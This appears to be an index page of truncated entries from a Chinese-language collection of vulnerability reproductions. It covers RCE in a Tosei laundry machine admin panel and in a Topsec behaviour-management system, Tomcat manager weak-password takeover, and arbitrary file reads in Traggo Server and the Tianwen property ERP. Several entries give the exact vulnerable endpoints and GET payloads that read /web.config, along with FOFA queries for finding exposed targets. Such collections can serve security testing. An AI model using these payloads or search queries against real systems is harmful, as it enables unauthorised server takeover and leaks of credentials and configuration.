T6-1Tosei-自助洗衣机-RCE 漏洞描述: Tosei 自助洗衣机 web 管理端存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令执行,在服务器任意执行代码,获取服务器权限,进而控制整个服务器。 网站图片: 网络测绘: fofa语法: FOFA:body=“t
T5-3Tomcat–InformationLeakage 漏洞复现: payload: POST / HTTP/1.1 Host: hostname Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24" Sec-Ch-Ua-Mobile: ?0 S
T5-1Tomcat-RCE 漏洞描述: tomcat启用manager(后台管理)功能,且存在弱口令 漏洞复现: 在 conf/tomcat-users.xml 文件中配置用户的权限和一个弱口令 tomcat/tomcat: payload: <tomcat-users> <role role
T4-1TraggoServer-任意文件读取 漏洞描述: Traggo Server是一个基于标签的时间跟踪工具。在Traggo中,没有任务,只有标记的时间跨度。可以用来跟踪、分析每天时间用在哪些地方,方便更好的管理时间,提高效率。Traggo存在任意文件读取漏洞。 网站图片: 网络测绘: Hun
T3-2天融信-上网行为管理-RCE 漏洞描述: 天融信上网行为管理系统 /view/IPV6/naborTable/static_convert.php接口blocks参数存在任意命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限,可能导致内网进一步被攻击。 网站图片: fofa语法:
T3-1天融信-上网行为管理-RCE 漏洞描述: 天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验,为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。 网站图片: 网络测绘: fofa语法: fofa app
T2-8天问-物业ERP系统-任意文件读取 漏洞复现: payload: GET /HM/M_main/InformationManage/ParkingFeelFileDownLoad.aspx?ParkingFile=/web.config HTTP/1.1 Host: User-Agent:
T2-7天问-物业ERP系统-任意文件读取 漏洞复现: payload: GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=/web.config HTTP/1.1 Host: User-
T2-6天问-物业ERP系统-任意文件读取 漏洞复现: payload: GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=/web.config HTTP/1.1 Host: User-Agent:
T2-5天问-物业ERP系统-任意文件读取 漏洞描述: 天问物业ERP系统 AreaAvatarDownLoad.aspx 接口处存在任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。 网站图片: fofa语法: body=“天问物业
